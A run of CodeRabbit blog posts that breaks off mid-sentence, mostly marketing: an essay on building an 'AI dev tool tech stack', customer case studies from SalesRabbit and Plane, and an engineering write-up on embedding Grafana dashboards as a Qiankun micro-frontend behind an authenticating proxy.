context-aware documentation drafts automatically—potentially cutting documentation time in half or more by generating inline comments, docstrings, API references, or even internal design and architecture docs. * These tools appeal to teams wanting to keep documentation continuously synchronized with code changes without manually updating every function comment or API description as the code evolves. * Increasingly, AI documentation tools support multiple programming languages and integrate directly into IDEs and CI/CD pipelines, proactively prompting devs to document their code as they write it, thus improving doc quality and reducing technical debt over time. ## Building your own AI dev tool stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f64c8c6561c371af7cee66d453b87fcf310af6b1b4163339b6cc434036b526fb_9895cb57a5.png) Adopting an [**AI dev tool stack**](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack) isn’t about just throwing a couple new AI tools into the mix. It’s about strategically bringing AI into every part of your development workflow. Using AI strategically at every step – from coding and reviewing to testing, refactoring, and documenting –can help your team get more done, reduce frustration, and significantly boost the overall quality of your codebase. We’d love to hear more about how you’re building your [AI dev tool stack](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack) and what’s working for you. Tag us on [Twitter](https://x.com/coderabbitai) or [LinkedIn](https://www.linkedin.com/company/coderabbitai). ***Interested in trying out our AI code review tool? Get a*** [***14-day free trial!***](https://app.coderabbit.ai/login?free-trial&_gl=1*1h48txm*_gcl_au*MjAwMTM2Mjk0MC4xNzQ0OTI5MzMx*_ga*NTAxMzUzODg4LjE3NDQ5MjkzMzE.*_ga_7YWHDJSXQ1*czE3NDk1MTI5OTQkbzcxJGcwJHQxNzQ5NTEyOTk0JGo2MCRsMCRoMTUzMTQ4NzEwMw..)

2025: The year of the AI dev tool tech stack

Aravind Putrevu — Tue, 10 Jun 2025 00:00:00 GMT

In April, Microsoft and Google announced that AI is generating 30% of the code at their companies. That indicates that AI coding tools have entered a new phase. They’ve become a [significant part of engineering workflows](https://x.com/deedydas/status/1917620131301318988) – even at large, enterprise companies. With [Dev Twitter](https://x.com/dok2001/status/1919734470703267975?s=46) [obsessed](https://x.com/xf1280/status/1919784079681065455?s=46) with [vibe coding](https://x.com/romainlaffitau/status/1918374724389798019?s=46b) these days, the question many devs we’ve been talking to are asking is what does all this AI use actually look like? Are developers vibe coding whole features for production using agentic coding capabilities? Or are they using AI primarily for tab completion and early prototyping? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/072ca73c1386b1afb778f828d8e90425135b7e92acf9fa91d301c59a4080b15c_7bf7463138.png) Ultimately, devs want to know what successful AI adoption really looks like across teams, companies, and industries. What AI tools are teams *actually* using? How are they getting *real value* from them? What rules, if any, are companies putting in place around AI usage? Are AI coding tools *really* boosting productivity or just helping teams code faster, but with more bugs? At CodeRabbit, we talk to hundreds of engineering teams every month about how they're using AI. That gives us early visibility into trends around AI adoption, and in the last few months, we've seen striking similarities in the ways development teams are thinking about AI. Let’s dive into what we’re hearing from customers – and why it’s convinced us 2025 is the year of the AI dev tool tech stack. ## Everyone has AI pain points now It likely comes as no surprise that the teams we talk to tell us that one of the major pain points of their AI coding tools is that the productivity and DevEx gains they deliver are inconsistent. With studies finding that AI coding tools can add up to [41% more bugs](https://resources.uplevelteam.com/gen-ai-for-coding) to your code, these tools have come with new challenges. A couple of weeks ago, Ryo Lu, Cursor’s Head of Design, [wrote a thread](https://x.com/ryolu_/status/1914384195138511142?s=46&t=v44WRRwh6MCK7nZNelMHxA) about the potential downsides of using Cursor to write code. In it, he listed 12 steps to take if you don’t want to end up with AI spaghetti you’ll be cleaning up all week. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b04184e9bf8e865899cbcf7d88ca5cb03e5ae349c954f228e47b42d14d2eb7a6_0f1c94d362.png) A tool that requires a 12-step guide for avoiding disastrous spaghetti code might be fine if you’re vibe coding a hobby project or on a team of mostly senior devs who can catch and edit out the spaghetti, but imagine what a junior developer could do to a legacy codebase in a highly regulated Fortune 500 company! In addition to more bugs and issues, we’re also hearing that AI coding tools have created bottlenecks at other points of the development cycle. It goes without saying that if you’re writing more code, you have to *review* more code, *test* more code, *document* more code, and *refactor* more code. Very quickly, your ‘*game-changing*’ AI productivity gains get held up at other manual parts of the development cycle. And that work can be harder and more time consuming given AI-generated code’s tendency to have more issues. ## A new way to code = A new tech stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/143b3a91ac21c68e1b4e197a43a2705a87b1fb16b68b0238a09c4fc4a2516f1e_9ad94257d5.png) That’s why [many devs](https://x.com/PrajwalTomar_/status/1932051939703058611) have come to an important realization this year: You can’t just introduce a transformative technology and leave the rest of the software development cycle intact. You need an end-to-end AI dev tool tech stack. It’s common for disruptive technologies to spark broader ecosystem changes. A great example is how GitHub’s 2008 launch resulted in the launch of both Circle CI and Jenkins three years later. AI coding tools seem to be following an even faster timeline. After a few years of using them, engineering leaders have realized that AI coding tools help sometimes but hurt sometimes, too. To *actually* realize the promised productivity gains, they need additional tools for the downstream tasks they create or make more difficult. But this shift to thinking about AI adoption as a stack is also about using the same approach of leveraging AI to boost productivity that worked for code generation for other manual tasks. Why not review faster and test faster if you’re coding faster? Especially since almost no one *loves* reviewing code or writing tests? In some cases, the ROI of leveraging AI at other stages of development might even be higher than what AI coding assistants deliver. That’s because those AI tools work to remove bugs from code rather than adding them in. ## What’s in the AI dev tool tech stack? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/591b45bf79c18a9b4b11c23c1a954fbf21e08b857dd21cb716ca86b416b98496_4421ed4fd8.png) The AI dev tool stacks we’re seeing our customers adopt are a layered set of AI tools that support every stage of the software development lifecycle. Here’s a quick look at the layers of that stack, how they fit together, and why you’ll probably be using most of them by the end of this year – if you aren’t already. * **Foundational:** AI coding tools * **Essential layer:** AI code review tools * **Optional layer:** AI QA test tools * **Optional layer:** AI refactoring tools * **Optional layer:** AI documentation tools ## Foundational: AI coding tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/568178634acf84dbbc057eca6bacef3cbe0050b9446b5dcd50eca8fba0bf00de_85887cb225.png) This is where most teams start. These tools help developers write code faster – either by suggesting autocompletes of what you’re currently writing or by generating entire functions, tests, or components based on natural language prompts. Over time, they’ve become more sophisticated with deeper codebase awareness, a greater commitment to code quality, and a recent focus on agentic, multi-step tasks. But these tools are still notorious for introducing bugs, vulnerabilities, and performance inefficiencies into code. That translates into developers doing a lot more code editing and reviewing. Increasingly, we’re hearing two things. First, devs aren’t just using one tool but often leveraging multiple tools based on what each tool is best at (a process satirized in [this tweet](https://x.com/aidenybai/status/1913634950236291562)). Second, devs are increasingly opinionated about which tool or tools they want to use – with the choice of an AI coding assistant becoming as divisive as whether to use a PC or a Mac. That’s led many teams to start giving developers a choice around AI assistants rather than choosing just one to buy licenses for. Given that they’re likely to also be more effective at using the tool they prefer – that benefits companies, too. We break these tools into five categories – though many tools span multiple categories. * **Tab completion tools:** GitHub Copilot, Cursor Tab, Windsurf, TabNine, Sourcegraph Cody, Qodo, Jetbrains * **AI coding assistants:** GitHub Copilot, Cursor, Windsurf, Claude Code, OpenAI Codex CLI, Traycer Zed, Cody by Sourcegraph, Aider, Qodo, Cline, Roocode, Blackbox, OpenHands, Gemini Code Assist, Augment Code, Amazon Q, JetBrains AI Assistant * **Agentic coding tools:** Cursor, Windsurf, GitHub Copilot, Claude Code, OpenAI Codex, Cline, Roocode, Blackbox AI, Continue, Devin, Jules, Augment Code, OpenHands * **AI app generator tools:** Lovable, v0, Bolt, Builder.io, Figma Make, Fine.dev, Stitch * **Codebase context tools:** Repomix, Repo Prompt, Context7 ## Essential layer: AI code review tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/856febd32378fbf365f528185cb10c30a2e1d3b190a3530a76c559ab3af61e9a_50e17e0c5a.png) AI code review tools sit at the center of the stack because they directly address the biggest bottleneck introduced by AI coding tools: the review process. If your code is getting written faster — and more often — by machines then you need a better way to review it. Trying to manually review increasingly more code as a team isn’t just a recipe for burnout, it also risks [quality degradation](https://www.atlassian.com/blog/add-ons/code-review-best-practices). Research shows that most devs can only manually review up to ~400 lines of code before fatigue sets in. That fatigue could mean devs miss more critical bugs then have to address them in production. Indeed, code review tools don’t just help you merge PRs up to 4x faster and reduce the time you spend reviewing by up to 50%. They are also essential in AI-assisted development to keep bugs from production given that AI coding tools have been found to [add up to 41% more bugs to code](https://resources.uplevelteam.com/gen-ai-for-coding). Using them protects your AI productivity savings by ensuring no bad code ends up in production. AI code reviews also help improve code quality, reduce reviewer fatigue, and standardize best practices across teams no matter which AI coding assistants your team members are using. Unlike code generation and agentic coding tools, their output isn’t wildly inconsistent since it doesn’t depend on the AI competency of any individual developer to know how to prompt them. But, perhaps more importantly, they leverage AI for what it’s best at – automating repetitive and tedious tasks devs don’t want to do. Who wants to spend an hour adding a dozen comments to a PR when AI can add most of those comments for you, give you easy 1-click fixes for each of them, and find bugs you might have missed? These tools come in three main flavors: * **Features of an AI coding tool:** Cursor, GitHub Copilot, JetBrains, Windsurf Forge (deprecated) * **Git-based AI code review tools:** CodeRabbit, Bito, Greptile, Qodo, Graphite Diamond * **Both IDE and git-based AI code review tools:** CodeRabbit, SonarQube, Qodo, Sourcery ## Optional layer: AI QA test generation & execution tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0c6681ef330815125625f1e38a6973e593d8c51d7582baed4728da1bfb439da7_24cc51678a.png) For many dev teams, QA testing has long included some form of AI. But a new generation of AI-powered QA tools promise to automate even more of the grunt work – especially around generating and maintaining tedious end-to-end tests that simulate real user journeys. Instead of manually thinking up every scenario, you can let an AI generate test cases or even entire test scripts from a natural language description of what needs to be checked. The benefits are hard to ignore. The most important is speed – they can churn out or execute suites of tests in a fraction of the time and generate dozens of scenarios at once. However, they also help achieve greater breadth of coverage by running through permutations a human might overlook or not have time for.. Some even offer self-healing capabilities to adjust tests when your UI or data changes, reducing maintenance headaches and keeping your test suite running smoothly as the app evolves. We break these down into two categories: * **AI test generation tools:** Testim, Mabl, Functionalize, testRigor, Autify, ACCELQ, Qodex, Tricentis * **AI test execution and maintenance tools:** MuukTest, Applietools, Sauce Labs, Perfecto, Meticulous ## Optional layer: AI Refactoring tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a3551f366d32a27481d19704a3399582f4480d576bc68867a88299adfbeacfde_7889c2d1f0.png) While some AI coding tools claim they can be used for refactoring, their results are often lackluster. For that reason, many companies adopt AI tools created explicitly for refactoring code as part of their AI dev tool tech stack after they’ve had bad experiences attempting to use coding tools for that use case. AI-powered refactoring tools promise to automate the tedious and repetitive aspects of improving your codebase from minor optimizations to significant architectural changes. Instead of spending hours manually hunting down inefficiencies or repeating the same structural tweaks across your codebase, these AI tools quickly identify and even execute refactoring opportunities from a simple natural-language description. We divide these tools into two types: * **Semi-automated tools:** CodeGPT, GitHub Copilot, Amazon CodeWhisperer, Sourcegraph Cody * **Fully automated tools:** Claude Code, Devin, OpenAI Codex ## Optional layer: AI documentation tools ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dede774fe55301a163152c94c5917760b27de2cbc30d0283d466f7b5d7b6bd00_a2d25e7ac7.png) While docs are never the first thing that teams think about when adopting AI, it’s one task that they appreciate getting help with when they do. These tools tackle one of coding’s most dreaded tasks—writing and updating code documentation like inline comments to docstrings. Instead of manually documenting every new function or combing through outdated guides, devs can let AI tools quickly draft readable, up-to-date documentation directly from the code itself, saving countless hours of tedious work. * **Code-level docs tools:** DeepWiki, Cursor, CodeRabbit, Swimm, GitLoop, GitSummarize ## Sample stacks So, what do some of these AI dev tool tech stacks look like? We’ve seen a range of configurations from company to company but here are some common stacks teams are using. ### ‘Comprehensive’ stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dc677d38553cda417b410d1846de9e2bd896aaff8518f9e28d1c9f85d441ffd9_bafa88344b.png) There’s a growing group of companies we encounter who have implemented or are in the process of implementing an end-to-end AI dev tool stack that includes an AI-powered coding tool, code review tool, QA tool, refactor tool, and docs tool. These are typically companies where there’s been significant internal leadership around AI adoption either from the C-Suite or engineering. They were also often early adopters of AI coding tools and have already seen their benefits so are looking for additional AI productivity and DevEx gains. ### ‘Choose-your-own-AI-tool’ stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/20ddda89e7480ffa3b79c519c77c06a786d69ac9364b27d5b22f93165141c28f_8d09a10bc9.png) We are increasingly seeing companies that are implementing AI tools throughout the development cycle AND giving their team more choice as to which tools they use. These companies understand (or have learned the hard way) that different AI tools are best suited for different kinds of work and that the best AI tool for any developer is the one they feel most comfortable prompting. This strategy hasn’t just anecdotally helped increase AI adoption but it’s also improved developer satisfaction and experience at these companies. That’s because, increasingly, developers are opinionated about which tool they use. Some companies offer developers choice over just their AI coding tool (Cursor, Copilot, or Claude Code?) while others will offer devs choice over other tools in the stack, as well. ### ‘Multiple coding tools’ stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/da51ac0a43aac63ea24646e474d27b19ef78659bc1bdee7d5557987c3dbba3ad_9c4d39598e.png) Not to be outdone by the companies that let developers choose their own AI tools are the companies that let devs choose multiple AI coding tools. Maybe they use Lovable for prototyping UI and then Cursor to write the app. Or they use TabNine for code completion and ChatGPT for code generation. More companies are saying yes to developers using more than one tool if they can make the case for why it will improve their productivity. ### ‘Partial’ stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/dffe9ca97181d0a7c99c204c91b8c25dc78da33ee12cccc322432f5caed93a20_edec241339.png) Not all companies that we’re seeing building an AI dev tool stack are adopting all the tools in the stack. Typically, however, their stacks involve an AI coding tool, an AI code review tool, and another AI tool from our list – be that an AI refactoring tool, an AI QA tool, or an AI docs tool. Which they adopt often depends on their codebase, internal expertise, and needs. For example, larger companies are more likely to adopt AI QA tools since they have a large enough team internally to manage QA whereas smaller companies are more likely to mostly outsource QA to contractors and agencies. ### ‘Essential’ stack ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2b3f0291b5b2e99345b6a09a139e3a5b41e63f64f2fc7401175839c78b8a14a7_207052fc4c.png) Finally, we see a lot of companies building just an ‘essential’ stack which includes just an AI coding tool and an AI code review tool to help navigate the added bugs and more complicated code reviews that typically result from using coding assistants. Code review tools also have some of the highest ROI of any AI tools – including AI coding tools – since they both save significant time and keep bugs out of production. ## Building your own AI dev tool stack: What to consider ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1724d6b6b69f94657814a2293a540a25fa87e46b0e4af567d380e5397315c927_4fd721f479.png) When it comes to building an AI dev tool stack, we’ve seen a number of approaches. Many adopted AI coding tools and then iteratively looked for individual solutions to the problems those tools created as downstream issues became particularly painful. Other companies took a more intentional approach with CTOs or other technical leaders investigating tools that could improve the development cycle and running proof-of-concept tests to see whether they actually deliver results. Some even waited to adopt AI coding tools and leveraged AI code review tools to address their existing code review backlogs first. We recommend a proactive approach since we often see teams suffering from delayed milestones and dev burnout before they start looking for solutions. Want more info about what we’ve been seeing around AI adoption of specific tools? We have [another post here](http://www.coderabbit.ai/blog/ai-adoption-how-developers-are-using-ai-dev-tools) where we go into greater details about the different types of tools in each category and how we’re seeing them helping engineering teams. We’d love to hear more about how you’re building your AI dev tool stack and what’s working for you. Tag us on [Twitter](https://x.com/coderabbitai) or [LinkedIn](https://www.linkedin.com/company/coderabbitai). ***Interested in trying out our AI code review tool? Get a*** [***14-day free trial!***](https://app.coderabbit.ai/login?free-trial&_gl=1*1h48txm*_gcl_au*MjAwMTM2Mjk0MC4xNzQ0OTI5MzMx*_ga*NTAxMzUzODg4LjE3NDQ5MjkzMzE.*_ga_7YWHDJSXQ1*czE3NDk1MTI5OTQkbzcxJGcwJHQxNzQ5NTEyOTk0JGo2MCRsMCRoMTUzMTQ4NzEwMw..)

How SalesRabbit reduced bugs by 30% and increased velocity by 25%

Manpreet Kaur — Thu, 05 Jun 2025 00:00:00 GMT

## **Overview** [SalesRabbit](https://salesrabbit.com/), a CRM and canvassing platform used by roofing, solar, and pest control companies, is no stranger to legacy code. In recent years, SalesRabbit has expanded its product line through multiple acquisitions – including [RoofLink in 2024](https://salesrabbit.com/insights/salesrabbit-acquires-rooflink-creates-incredible-value-for-rooftop-sales-teams/), a roofing-focused CRM. Those expansions came with new challenges: multiple legacy codebases in different languages (C#, Elixir, Python, and even C) and no easy way to assess code quality across them. With 20 engineers, CTO Michael Archibald needed a scalable way to maintain engineering velocity while gaining visibility into an inherited codebase, reducing bugs, and supporting less experienced developers on the team. That’s where CodeRabbit came in. ## **The challenge: Legacy codebase & high defect rates** Before CodeRabbit, SalesRabbit was trying to grapple with an inherited codebase from a new acquisition while dealing with many of the common challenges engineering teams face around code reviews. Those included delays in reviews that slowed down deployment velocity and inconsistent coding standards. * **Unfamiliar legacy codebases after acquisitions** The SalesRabbit team was spread out across a growing number of languages. While SalesRabbit started as a PHP application, they acquired a company with a C# codebase, shifted some of their own codebase to Elixir, and were about to buy RoofLink, whose code was in Python. It was the introduction of that Python codebase with SalesRabbit’s acquisition of RoofLink that initially prompted Michael to research AI code review tools. “I was looking for some automated tools, primarily AI, that could help us understand the codebase a little faster and better validate the quality of the code,” he shared. * **High defect escape rate** Michael has always been hyper-focused on improving application quality. When he joined SalesRabbit as CTO six years ago, the company was facing frequent downtime. Since then, they've improved to 99.99% availability and scaled their team. But, after the acquisition, Rooflink’s defect escape rate gave him cause for concern. While Rooflink wasn’t tracking how many bugs made their way to production, anecdotally, the Rooflink support team told him they were used to fielding customer complaints on nearly every release. It seemed clear that the code at the company wasn’t being as thoroughly reviewed as it should be. * **Slow review cycle** With an ambitious roadmap and multiple products across the company, Michael had to ensure the team maintained velocity. But manual code reviews were inconsistent and often took several days, slowing deployment significantly. One problem was that the team had a large number of junior engineers – which meant fewer senior developers who could review code. Michael wanted a solution that would make reviews easier. * **AI coding tools caused code quality issues** While SalesRabbit’s engineers leveraged Copilot and other AI coding tools to help write code faster, it created problems with code quality. “The junior engineers were introducing a lot of bugs with these tools,” Michael explained. That caused him to try to find other AI tools that would better support the junior engineers on the team. * **Inconsistent coding standards** Different teams across SalesRabbit and RoofLink used different styles and standards, often due to legacy standards at the acquired companies. But style inconsistencies added friction. A central governance layer was needed to enforce best practices. “We just want everyone to be the same,” said Michael. ## Why SalesRabbit loves CodeRabbit %[https://youtu.be/0WmK5QqqjJY?feature=shared] ### **The engineers all wanted it – and used it** Michael wasn’t initially convinced that CodeRabbit would solve his team’s problems. “I came across CodeRabbit and thought, ‘It's relatively inexpensive. I'm going to just give one or two engineers a seat and see how they like it,” he explained. “But almost immediately everybody on my team was like, oh, I want this, I want this.” That level of enthusiasm for a tool is something Michael listens to. When he joined SalesRabbit, the company was facing 80% engineering churn and he’s since worked hard to improve developer satisfaction and stabilize the engineering org. “One of the litmus tests for me with AI tools is: do engineers want it? I don’t like pushing AI tools on engineers,” Michael said. “With CodeRabbit, everybody asked for it almost immediately.” Initially tested with junior developers, senior engineers also quickly recognized its value around bug fixes, refactor suggestions, and security checks. “With CodeRabbit,, everybody was like, give me this. This is fantastic. It speeds up code reviews,” Michael said. “We went from a small test to full adoption very quickly.” ### **CodeRabbit found more issues than any human** While Michael had been worried about Rooflink’s defect escape rate, CodeRabbit reduced it significantly – and almost immediately. “We could have started putting processes in place to improve things but those can take weeks and months before we get measurement,” he explained. “Code Rabbit seemed to have an almost immediate impact. Code quality has gone up and the only thing we've adjusted has been adding CodeRabbit to all of the deploys.” Michael isn’t surprised it’s been so effective at reducing issues. “I feel very comfortable saying that it's caught a lot more bugs than any human has,” he said. ### **An AI tool that… didn’t introduce more bugs** Unlike Copilot and other AI coding tools, which focused on writing code and resulted in a lot of added bugs, CodeRabbit focused on finding and fixing them. That gave SalesRabbit the visibility and quality gates they needed at the PR stage to keep defects out of production. “It works especially well for junior developers,” Michael said. “It helps them spot patterns and mistakes they’d otherwise miss.” SalesRabbit was also able to more quickly understand their inherited codebase. “It really helped us to determine the code quality,” shared Michael. ### **It fixed style consistency issues** CodeRabbit’s built-in style enforcement reduced the need for custom linters or style checkers, helping standardize code across legacy and modern languages. “CodeRabbit does a really good job saying, ‘this might be a bad pattern’ or ‘you’re not following style here,’” Michael explained. “We were able to get rid of a lot of tooling we put in place for managing code styles because CodeRabbit has a version of that built-in.” What’s helpful is having one centralized code quality enforcement tooling for legacy languages like C# and modern ones like Elixir and Python “We just want everyone to be kind of the same,” said Michael. “CodeRabbit does that for us.” ## The results: Better code, lower defect rate, happier engineers ![](https://victorious-bubble-f69a016683.media.strapiapp.com/80b14bd59c022c52783551ba24cf230656ae1b2c5cc3c082943c4d440a738b87_6e349aaf64.png) With CodeRabbit, SalesRabbit has seen impressive results: ### **30% fewer defects** The defect escape rate decreased by at least 30% after introducing CodeRabbit, improving system reliability. Support teams even noticed the difference. “It had almost an immediate impact,” Archibald said. ### **25% Faster deployments** CodeRabbit’s automated first-pass review enabled faster iterations, reducing release cycle time – even with a complex legacy codebase. Then, one-click fixes helped them quickly commit the changes identified. ### **Significant style and standards consistency improvements** While it’s hard to measure, Michael feels strongly that CodeRabbit helped them level up their code quality significantly. “It's improved our code style,” he attests. ### **Happier engineers** Michael’s focus is on keeping the engineers at SalesRabbit happy ***and*** productive. That’s why he’s never wanted to push AI tools on them that they didn’t want. But CodeRabbit was a tool that his engineering team all wanted. “The developers have really enjoyed using it,” he shared. ## **CodeRabbit = Less review overhead, more velocity** For SalesRabbit, adopting CodeRabbit was low-lift but high-impact. Their team was able merge PRs at least 25% faster, improve defect detection in legacy C# and Python code, and increase developer efficiency by freeing them from multi-day review cycles. The AI-powered reviews only take hours now, instead of days, and enable faster deployments. CodeRabbit was also able to find bugs that junior engineers were letting slip by when using AI coding tools. With review cycles shortened, developer confidence increased, and the entire team more aligned around coding practices, Michael’s glad he found CodeRabbit when he did. As Michael puts it: *“Before CodeRabbit, we struggled with inconsistencies in code reviews and defects slipping into production. It’s improved our coding standards, especially in C#, provided a centralized governance layer for code style enforcement, and significantly reduced production defects.”* With CodeRabbit’s expanding feature set, especially the recent support for automated docstrings insertion and the future support for agentic workflow-based automated unit-test insertion, SalesRabbit anticipates seeing even more efficiency gains soon. Want see how CodeRabbit can help your team? [**Get a 14-day trial.**](https://coderabbit.link/aaSJ3ng)

How we built dashboards with a micro-frontend & Grafana

Gurinder Singh — Mon, 02 Jun 2025 00:00:00 GMT

Modern dev teams rely on data. Without analytics, how would you know if your team is improving its deployment velocity and code quality over time? At CodeRabbit, we want teams to have the data that matters when it comes to tracking their performance. That’s why we created a unique integration with [Grafana](https://grafana.com/), a leading analytics platform, that provides greater visibility into your organization’s code review metrics through interactive dashboards directly in the CodeRabbit UI. [CodeRabbit](http://www.coderabbit.ai), an AI-powered code reviewer, can be seamlessly installed on your git platform to review pull requests and deliver actionable insights. By embedding Grafana as a micro-frontend, we’ve made it easier for teams to understand the impact of code reviews on their organization. In this post, we’ll cover why we decided to integrate dashboards in our application via a micro-frontend framework and how we built our Single SPA micro-frontend with the help of [Qiankun](https://qiankun.umijs.org/). ## Why use Grafana as a Single SPA micro-frontend? When it comes to showing analytics in a single-page application, developers often face challenges. Building custom dashboards from scratch requires significant coding effort, and maintaining that code becomes a burden. Adding new metrics or dashboard panels typically involves creating new APIs and modifying frontend code, making the process slow and cumbersome. To address these challenges, we decided to leverage Grafana as a Single SPA micro-frontend. This decision allowed us to streamline the addition of new dashboards while managing Grafana separately and deploying updates with ease. By doing so, we reduced development overhead and improved scalability. ## Adding Grafana as a Single SPA micro-frontend with Qiankun Grafana offers robust data visualization capabilities. To integrate it seamlessly into our UI, we [forked Grafana](https://github.com/coderabbitai/grafana), customized its dashboard page, and implemented it using [Qiankun](https://qiankun.umijs.org/). This micro-frontend architecture enabled us to retain the native Grafana experience while tailoring the interface to align with CodeRabbit’s needs. Micro-frontend architectures are particularly useful when integrating multiple JavaScript frontend applications, even those built with different frameworks. After exploring various micro-frontend framework options, we chose the [Qiankun](https://qiankun.umijs.org/) micro-frontend library to implement this architecture. Qiankun, built on top of the [single-spa](https://single-spa.js.org/) micro-frontend framework, provides a simple API that makes it easy to manage micro-frontend architectures. ## Using the Qiankun micro-frontend framework to overcome architectural challenges Most micro-frontends are mounted in the main app based on specific routes. However, our use case required dashboards to be displayed dynamically across multiple routes and on tab changes. To achieve this, We used Qiankun’s loadMicroApp API which implements the single-spa parcel api under the hood. This approach eliminated common limitations of micro-frontend architectures. To improve performance and faster load time. We have used caching in our Grafana proxy server. ## Securing our Grafana micro-frontend with authentication Authenticating Grafana using our UI credentials was a critical challenge. Typically, Grafana relies on an API key for access. To handle this, we created a proxy server which first authenticates a CodeRabbit user and then proxy forwards Grafana. While this setup worked initially, it exposed a potential vulnerability: Grafana allowed any query to be sent in the request, posing a risk of data leaks. To mitigate this, we added a validation layer that: 1. Ensures only pre-defined queries are allowed. 2. Scopes requests to specific organizations and restricts access to queries explicitly associated with dashboards. This solution secured the Grafana micro-frontend integration by preventing unauthorized data access and ensuring a robust implementation. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3b1c5d9aa3df1a4727da5bdd9cc77bcbc6dd92ba3d75205506f3e5302be1eb54_a6f68728ab.png) The flow diagram above shows an micro-frontend architecture overview. The CodeRabbit UI mounts the Grafana dashboard using Qiankun by accessing a public micro-frontend endpoint that exports component lifecycle functions. Once mounted, all API calls to Grafana are routed through our authentication service for secure access. ## Our use case for dashboards ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ccda3bf76d8af7146a853636709307def81766db20537f87fc2e2964b33e99fc_575f5c4e02.png) At CodeRabbit, our goal is to demonstrate the value our product adds to an organization by providing AI-driven code reviews. To achieve this, we collect and analyze data stored in our data layer and use it to create insightful panels that tell the story of CodeRabbit's impact on our customers’ development cycle. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a8d207f787b4cacffaf8e6a45ba8d695709844132ca28beadbbef703dc98219a_e384465650.png) The dashboards include metrics such as the average number of pull requests (PRs) reviewed per day and the total number of reviews conducted by CodeRabbit. Additionally, they showcase the various language-specific tools leveraged to fine-tune reviews, offering deeper insights into how CodeRabbit adapts to diverse development environments. These panels also highlight key contributions, such as the number of comments, suggestions, and chat conversations facilitated by CodeRabbit to improve code quality. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e99b337d066a5df5998b63731c696c78922176d3855b743afc7dffe68ec7007f_a4578a6917.png) By integrating Grafana as a Single SPA micro-frontend, we were able to design and serve these visualizations seamlessly within the CodeRabbit UI while reducing the amount of development and maintenance work. ## Benefits of Single SPA micro-frontend architecture Integrating Grafana as a Single SPA micro-frontend architecture has transformed how we deliver analytics to our users. Since Grafana is a separate service to modify dashboards, we just have to make changes in Grafana dashboards and provision changes using Grafana Dashboard provisioning. Using Grafana as a Qiankun and Single SPA micro-frontend in CodeRabbit has allowed us to deliver a powerful, secure, and dynamic analytics experience for our users. Looking ahead, we plan to expand our dashboard offerings and explore additional Grafana plugins to provide even more insightful analytics. For developers looking to streamline analytics integration, we highly recommend exploring Grafana as a micro-frontend—it’s a game-changer for simplifying dashboard management and enhancing scalability. Interested in trying out CodeRabbit? [Get a free 14-day trial.](https://app.coderabbit.ai/login???free-trial&_gl=1*1x8ils1*_gcl_au*MjAwMTM2Mjk0MC4xNzQ0OTI5MzMx) Want to join our team? Check out our [Careers page!](https://coderabbit.link/63iJMZY)

How CodeRabbit helped Plane get their release schedule back on track

Aravind Putrevu — Fri, 30 May 2025 00:00:00 GMT

## **Overview** [Plane](https://plane.so/), an open-core project management solution, had an ambitious roadmap and a tight-knit team determined to move fast. Despite the frontend team’s small size—just 12 engineers—they were responsible for significant scope: building and maintaining their cloud, self-hosted, and [popular open source](http://github.com/makeplane/plane) versions, fixing bugs, deploying new features, and continuously improving Plane’s performance and security. As the most popular open source project management tool, they also needed to review multiple, complex pull requests a day – including those from their many OSS contributors. That proved to be a blocker for the team. *“Long review cycles slowed us down,*” explained Principal Engineer Sriram Veeraghanta. *“Without clear PR summaries, understanding changes took time, delaying merges and feature releases. Bugs and inconsistencies slipped through, adding to tech debt.”* Eager to free up developer time and get their release schedule back on track, Sriram decided to try CodeRabbit, an AI-powered code review platform recommended to him by one of Plane’s OSS contributors. The result? Drastic improvements in review speed, code quality, and developer satisfaction. For Plane, that translated into less time spent buried in pull requests and more time hitting milestones that actually matter. ## **The challenge: A manual code review bottleneck** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c21b64615bee4ece77a613a641eafe17e33c5a1934a1a3dd28b44a127395ec5f_82626eb888.png) Before CodeRabbit, Plane relied on what Sriram characterized as the ‘standard process’ of manual reviews using code editors and GitHub’s built-in tools. *“It worked,”* he shared, *“but was time-consuming and required a lot of back-and-forth to fully understand changes.”* That manual code review process just couldn’t keep up with the speed of Plane’s development cycle. * **High pull request volume** As an application-layer SaaS company building flexible open-core project management software, Plane’s roadmap involved building a wide range of vertical features. That – plus the typical volume of spam and fluff PRs an OSS tool receives –- translated into a steady stream of PRs. For Plane’s senior engineers, that made for an overwhelming daily workload of scanning line after line during manual code reviews. With [research showing](https://www.atlassian.com/blog/add-ons/code-review-best-practices) quality degradation in manual code reviews after 1 to 2 hours a day or reviewing ~400 lines, Sriram’s team struggled to keep up. * **Limited context in PRs** Many developers wrote only brief or no descriptions for their PRs, forcing reviewers to piece together a puzzle. *“It was hard to grasp the context,”* recalled Sriram. *“I had to manually go through files to understand the changes.”* * **Slowed delivery and hidden bugs** Manual code reviews caused merges and releases to slow down – interfering with Plane’s product roadmap. While basic static checks or linting tools caught some issues, many bugs, vulnerabilities, and large-scale refactoring complications often slipped through as each PR demanded significant engineering attention. * **Trapped in a cycle of low developer productivity** With developers spending so much time on manual code reviews, they had less time to concentrate on writing code. That didn’t just impact velocity but also impacted code quality – which then meant that future code reviews would take even longer. That led to what felt like endless review cycles for Plane’s senior engineers. ## **Why Plane loves CodeRabbit** ### **Instant AI Summaries & Sequence Diagrams** For Plane, CodeRabbit’s AI-generated summaries and the Sequence Diagrams were an immediate 